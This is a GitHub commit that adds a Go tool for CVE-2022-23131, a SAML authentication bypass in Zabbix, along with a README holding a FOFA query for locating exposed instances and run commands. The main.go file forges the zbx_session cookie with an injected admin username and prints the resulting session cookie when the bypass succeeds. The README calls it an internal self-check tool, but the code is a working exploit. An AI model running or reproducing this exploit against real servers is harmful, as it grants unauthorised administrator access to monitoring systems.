add go script

jweny · Feb 21, 2022 · 2d4459a · 2d4459a
1 parent 013175a
commit 2d4459a
Show file tree

Hide file tree

Showing 7 changed files with 213 additions and 6 deletions.
diff --git a/.DS_Store b/.DS_Store
diff --git a/README.md b/README.md
@@ -1,14 +1,23 @@
-# zabbix-saml-bypass-exp-
-cve-2022-23131 exp
+# zabbix-saml-bypass-poc
+
+ cve-2022-23131 
+
+本程序仅供甲方企业用户人员内部风险自查使用，禁止用于任何形式的未授权安全测试。
 
 ```
 fofa: app="ZABBIX-监控系统" && body="saml" 
 ```
 
-![image-20220218164224691](docs/image-20220218164224691.png)
+使用方法：
+
+```
+go build -o zexp  
+chmod a+x zexp
+./zexp check -t https://x.x.x.x/index.php -u Admin
+```
 
-1. replace [zbx_signed_session] to  [cookie] 
-2. sign in with Single Sign-On (SAML)
+截图：
 
-![image-20220218164332289](docs/image-20220218164332289.png)
+![image-20220221122155042](docs/image-20220221122155042.png)
 
+![image-20220221122233215](docs/image-20220221122233215.png)
diff --git a/docs/image-20220221122155042.png b/docs/image-20220221122155042.png
diff --git a/docs/image-20220221122233215.png b/docs/image-20220221122233215.png
diff --git a/go.mod b/go.mod
@@ -0,0 +1,23 @@
+module main
+
+go 1.17
+
+require (
+	github.com/kataras/golog v0.1.7
+	github.com/urfave/cli/v2 v2.3.0
+	github.com/xiecat/xhttp v0.0.0-20220117022559-2545617efd91
+)
+
+require (
+	github.com/cpuguy83/go-md2man/v2 v2.0.0-20190314233015-f79a8a8ca69d // indirect
+	github.com/kataras/pio v0.0.10 // indirect
+	github.com/russross/blackfriday/v2 v2.0.1 // indirect
+	github.com/shurcooL/sanitized_anchor_name v1.0.0 // indirect
+	github.com/thoas/go-funk v0.9.1 // indirect
+	golang.org/x/crypto v0.0.0-20210220033148-5ea612d1eb83 // indirect
+	golang.org/x/net v0.0.0-20220114011407-0dd24b26b47d // indirect
+	golang.org/x/sys v0.0.0-20210423082822-04245dca01da // indirect
+	golang.org/x/text v0.3.6 // indirect
+	golang.org/x/time v0.0.0-20211116232009-f0f3c7e86c11 // indirect
+	software.sslmate.com/src/go-pkcs12 v0.0.0-20210415151418-c5206de65a78 // indirect
+)
diff --git a/go.sum b/go.sum
@@ -0,0 +1,51 @@
+github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=
+github.com/cpuguy83/go-md2man/v2 v2.0.0-20190314233015-f79a8a8ca69d h1:U+s90UTSYgptZMwQh2aRr3LuazLJIa+Pg3Kc1ylSYVY=
+github.com/cpuguy83/go-md2man/v2 v2.0.0-20190314233015-f79a8a8ca69d/go.mod h1:maD7wRr/U5Z6m/iR4s+kqSMx2CaBsrgA7czyZG/E6dU=
+github.com/davecgh/go-spew v1.1.0 h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8=
+github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/kataras/golog v0.1.7 h1:0TY5tHn5L5DlRIikepcaRR/6oInIr9AiWsxzt0vvlBE=
+github.com/kataras/golog v0.1.7/go.mod h1:jOSQ+C5fUqsNSwurB/oAHq1IFSb0KI3l6GMa7xB6dZA=
+github.com/kataras/pio v0.0.10 h1:b0qtPUqOpM2O+bqa5wr2O6dN4cQNwSmFd6HQqgVae0g=
+github.com/kataras/pio v0.0.10/go.mod h1:gS3ui9xSD+lAUpbYnjOGiQyY7sUMJO+EHpiRzhtZ5no=
+github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
+github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
+github.com/russross/blackfriday/v2 v2.0.1 h1:lPqVAte+HuHNfhJ/0LC98ESWRz8afy9tM/0RK8m9o+Q=
+github.com/russross/blackfriday/v2 v2.0.1/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM=
+github.com/shurcooL/sanitized_anchor_name v1.0.0 h1:PdmoCO6wvbs+7yrJyMORt4/BmY5IYyJwS/kOiWx8mHo=
+github.com/shurcooL/sanitized_anchor_name v1.0.0/go.mod h1:1NzhyTcUVG4SuEtjjoZeVRXNmyL/1OwPU0+IJeTBvfc=
+github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
+github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4=
+github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5CcY=
+github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+github.com/thoas/go-funk v0.9.1 h1:O549iLZqPpTUQ10ykd26sZhzD+rmR5pWhuElrhbC20M=
+github.com/thoas/go-funk v0.9.1/go.mod h1:+IWnUfUmFO1+WVYQWQtIJHeRRdaIyyYglZN7xzUPe4Q=
+github.com/urfave/cli/v2 v2.3.0 h1:qph92Y649prgesehzOrQjdWyxFOp/QVM+6imKHad91M=
+github.com/urfave/cli/v2 v2.3.0/go.mod h1:LJmUH05zAU44vOAcrfzZQKsZbVcdbOG8rtL3/XcUArI=
+github.com/xiecat/xhttp v0.0.0-20220117022559-2545617efd91 h1:EON4QnnRXCG8o2U/XYJGWD5U1nd6THt0/6rG+7c2/vg=
+github.com/xiecat/xhttp v0.0.0-20220117022559-2545617efd91/go.mod h1:UnSHXKfwJ1th2smyjlO2FG3i4PvD1/OxXN0UE7dI3yQ=
+golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
+golang.org/x/crypto v0.0.0-20210220033148-5ea612d1eb83 h1:/ZScEX8SfEmUGRHs0gxpqteO5nfNW6axyZbBdw9A12g=
+golang.org/x/crypto v0.0.0-20210220033148-5ea612d1eb83/go.mod h1:jdWPYTVW3xRLrWPugEBEK3UY2ZEsg3UU495nc5E+M+I=
+golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+golang.org/x/net v0.0.0-20220114011407-0dd24b26b47d h1:1n1fc535VhN8SYtD4cDUyNlfpAF2ROMM9+11equK3hs=
+golang.org/x/net v0.0.0-20220114011407-0dd24b26b47d/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
+golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20210423082822-04245dca01da h1:b3NXsE2LusjYGGjL5bxEVZZORm/YEFFrWFjR8eFrw/c=
+golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/term v0.0.0-20201117132131-f5c789dd3221/go.mod h1:Nr5EML6q2oocZ2LXRh80K7BxOlk5/8JxuGnuhpl+muw=
+golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
+golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
+golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M=
+golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
+golang.org/x/time v0.0.0-20211116232009-f0f3c7e86c11 h1:GZokNIeuVkl3aZHJchRrr13WCsols02MLUcz1U9is6M=
+golang.org/x/time v0.0.0-20211116232009-f0f3c7e86c11/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
+golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
+gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
+gopkg.in/yaml.v2 v2.2.3/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
+software.sslmate.com/src/go-pkcs12 v0.0.0-20210415151418-c5206de65a78 h1:SqYE5+A2qvRhErbsXFfUEUmpWEKxxRSMgGLkvRAFOV4=
+software.sslmate.com/src/go-pkcs12 v0.0.0-20210415151418-c5206de65a78/go.mod h1:B7Wf0Ya4DHF9Yw+qfZuJijQYkWicqDa+79Ytmmq3Kjg=
diff --git a/main.go b/main.go
@@ -0,0 +1,124 @@
+package main
+
+import (
+	"bytes"
+	"context"
+	"encoding/base64"
+	"encoding/json"
+	"github.com/kataras/golog"
+	"github.com/urfave/cli/v2"
+	"github.com/xiecat/xhttp"
+	"net/http"
+	"net/url"
+	"os"
+)
+
+func main() {
+	app := &cli.App{
+		Name:  "zabbix saml bypass self-check tool",
+		Usage: "developed by jweny(https://github.com/jweny)",
+		Commands: []*cli.Command{
+			{
+				Name:    "check",
+				Aliases: []string{"c"},
+				Usage:   "check multi assets",
+				Flags: []cli.Flag{
+					&cli.StringFlag{
+						Name:     "target",
+						Aliases:  []string{"t"},
+						Usage:    "target for check",
+						Required: true,
+					},
+					&cli.StringFlag{
+						Name:     "username",
+						Aliases:  []string{"u"},
+						Usage:    "default username",
+						Required: true,
+					},
+				},
+				Action: func(c *cli.Context) error {
+					target := c.String("target")
+					req, err := http.NewRequest("GET", target, nil)
+					if err != nil {
+						return err
+					}
+					defaultUsername := c.String("username")
+					if defaultUsername == "" {
+						defaultUsername = "Admin"
+					}
+					if result, cookie := exp(req, defaultUsername); result {
+						golog.Infof("vul exist! target: %s, cookie: %s", target, cookie)
+					}
+					return nil
+				},
+			},
+		},
+	}
+	err := app.Run(os.Args)
+	if err != nil {
+		golog.Fatal(err)
+	}
+}
+
+func exp(req *http.Request, defaultName string) (bool, string) {
+	c, err := xhttp.NewDefaultClient(nil)
+	if err != nil {
+		return false, ""
+	}
+	xReq := &xhttp.Request{RawRequest: req}
+	ctx := context.Background()
+
+	resp, err := c.Do(ctx, xReq)
+	if err != nil {
+		return false, ""
+	}
+
+	if !bytes.Contains(resp.Body, []byte("SAML")) {
+		return false, ""
+	}
+	mayVul := false
+	var cookie *http.Cookie
+	for _, c := range resp.RawResponse.Cookies() {
+		if c.Name == "zbx_session" {
+			mayVul = true
+			cookie = c
+			break
+		}
+	}
+	if !mayVul {
+		return false, ""
+	}
+
+	zabbixSession, err := url.PathUnescape(cookie.Value)
+	if err != nil {
+		return false, ""
+	}
+	zabbixSessionBytes, err := base64.StdEncoding.DecodeString(zabbixSession)
+	if err != nil {
+		return false, ""
+	}
+	sign := make(map[string]interface{})
+	err = json.Unmarshal(zabbixSessionBytes, &sign)
+	if err != nil {
+		return false, ""
+	}
+	sign["saml_data"] = map[string]string{
+		"username_attribute": defaultName,
+	}
+	signBytes, err := json.Marshal(sign)
+	if err != nil {
+		return false, ""
+	}
+	cookie.Value = url.PathEscape(base64.StdEncoding.EncodeToString(signBytes))
+	xReq.RawRequest.AddCookie(cookie)
+	xReq.RawRequest.URL.Path = "/index_sso.php"
+
+	resp, err = c.Do(ctx, xReq)
+	if err != nil {
+		return false, ""
+	}
+	if resp.GetStatus() == 302 && resp.GetHeaders().Get("Location") == "zabbix.php?action=dashboard.view" {
+		return true, cookie.Raw
+	}
+	return false, ""
+}